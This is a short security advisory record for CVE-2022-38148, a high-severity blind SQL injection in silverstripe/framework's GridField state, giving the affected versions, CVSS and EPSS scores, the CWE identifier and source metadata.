CVE-2022-38148 – silverstripe/framework

Package

Manager: composer
Name: silverstripe/framework
Vulnerable Version: >=4.0.0 <4.10.11 || >=4.11.0 <4.11.14

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00219 pctl0.44465

Details

Blind SQL Injection via GridFieldSortableHeader Gridfield state is vulnerable to SQL injections. The vast majority of Gridfields in Silverstripe CMS are affected by this vulnerability. An attacker with CMS access could execute an arbitrary SQL statement by adding an SQL payload in some parts of the GridField state.

Metadata

Created: 2022-11-22T00:00:07Z
Modified: 2025-04-30T20:39:16Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-rr8h-f97q-8p9c/GHSA-rr8h-f97q-8p9c.json
CWE IDs: ["CWE-89"]
Alternative ID: GHSA-rr8h-f97q-8p9c
Finding: F297
Auto approve: 1